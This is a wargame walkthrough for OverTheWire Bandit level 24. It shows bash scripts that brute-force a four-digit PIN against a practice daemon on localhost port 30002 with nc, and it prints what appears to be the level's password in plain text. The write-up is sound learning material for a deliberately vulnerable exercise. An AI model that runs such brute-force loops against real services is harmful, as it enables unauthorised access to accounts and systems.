Bandit LV 24: brute force password script
#bash #scripting #nc #networking #ports
What we know:
- There is an open and listening port (30002) that will send back the password if it receives the current level's password + the correct pin
What to do with this knowledge:
Attempt 1: I tried writing a script that iterates through 0000-9999, combines each number with the current level's password, and then sends each line to the port:
```bash
#!/bin/bash
start=0000
count=9999
# -lt stops before 9999, so the last pin is never tried
while [ $start -lt $count ]
do
  # "current password" stands for the real bandit24 password.
  # Every iteration opens a fresh nc connection, sends one line, and then
  # sits on that connection until the server prints "Timeout. Exiting."
  echo "current password $start" | nc localhost 30002
  ((start++))   # arithmetic drops the zero padding: 0000 becomes 1, not 0001
done
```
Mistakes Made:
Unfortunately, my loop never stopped looping...
```text
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct current password. Try again.
Timeout. Exiting.
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct current password. Try again.
```
FOLLOW UP ON WHY
Attempt 2: Breaking it down more
This time I decided to separate the problem into two parts:
Script 1: Create a list of possible password + pin combos
```bash
#!/bin/bash
touch list.txt
# brace expansion keeps the zero padding, so the pins run 0000..9999
for i in {0000..9999}
do
  echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> list.txt
done
```
Script 2: Iterate through my list.txt and send each one to the listening daemon with nc
```bash
#!/bin/bash
# Read list.txt line by line and send every line over a single nc
# connection, so the server keeps answering "Try again" instead of
# timing out once per pin. Filtering out the "Wrong!" replies leaves
# the one response that carries the bandit25 password.
while read -r line
do
  echo "$line"
done < list.txt | nc localhost 30002 | grep -v "Wrong!"
```
And voila!